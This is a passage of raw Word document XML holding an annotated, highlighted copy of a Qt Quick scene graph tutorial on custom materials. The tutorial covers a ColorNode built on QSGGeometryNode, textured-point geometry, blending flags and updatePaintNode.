          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>m_geometry</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QSGSimpleMaterial</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</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material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Shader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createMaterial</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material</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setFlag</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QSGMaterial</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Blending</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setMaterial</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material</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setFlag</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OwnsMaterial</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QSGGeometry</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_geometry</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lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ColorNode</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">class is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>supposed to draw something, so it needs to be a subclass of</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B" w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2154" w:history="1">
        <w:r w:rsidRPr="00B31A2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>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 xml:space="preserve">Since our </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expects both</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>texture coordinate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, we use the default attribute set</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2155" w:anchor="defaultAttributes_TexturedPoint2D" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometry::defaultAttributes_TexturedPoint2D</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() and declare that the geometry consists of a total of four vertices. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To avoid the allocation, we make</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2156" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometry</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a member of the</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2157" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>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When we used the macro</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2158" w:anchor="QSG_DECLARE_SIMPLE_COMPARABLE_SHADER" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSG_DECLARE_SIMPLE_COMPARABLE_SHADER</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() above, it defined the</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>createMaterial()</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function which we use to instantiate materials for our</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>struct.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As we will be making use of opacity in our custom material, we need to set the</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2159" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="00B31A2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGMaterial::Blending</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B31A2B" w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The scene graph may use this flag to either disable or enable</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GL_BLEND</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when drawing the node or to reorder the drawing of the node.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRPr="00B31A2B" w:rsidRDefault="00CD4012" w:rsidP="00CD4012">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we tell the node to take </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ownership of the material, so we do not have to explicitly memory-manage it</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B" w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this topic about memory management.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class</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Item</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public</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QQuickItem</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Q_OBJECT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Q_PROPERTY</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QColor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> color READ color WRITE setColor NOTIFY colorChanged</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public</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Item</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setFlag</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ItemHasContents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true</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setColor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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QColor</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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if</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m_color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m_color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color</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emit colorChanged</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update</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QColor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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const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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_color</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signals</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> colorChanged</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private</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QColor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_color</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Since the Item is providing its own graphics to the scene graph, we set the flag</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2160" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="00CD4012">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::ItemHasContents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:color w:val="404244"/>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public</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QSGNode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updatePaintNode</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QSGNode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node</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UpdatePaintNodeData</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lastRenderedPageBreak/>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ColorNode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n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static_cast</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ColorNode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node</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if</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node</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n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new</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ColorNode</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QSGGeometry</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updateTexturedRectGeometry</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n</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geometry</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boundingRect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QRectF</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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0</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1</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1</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static_cast</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSGSimpleMaterial</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;*&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</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material</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state</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 xml:space="preserve">color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m_color</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n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>markDirty</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QSGNode</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DirtyGeometry</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QSGNode</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DirtyMaterial</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</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Whenever the Item has changed graphically, the</w:t>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2161" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="00B31A2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B31A2B">
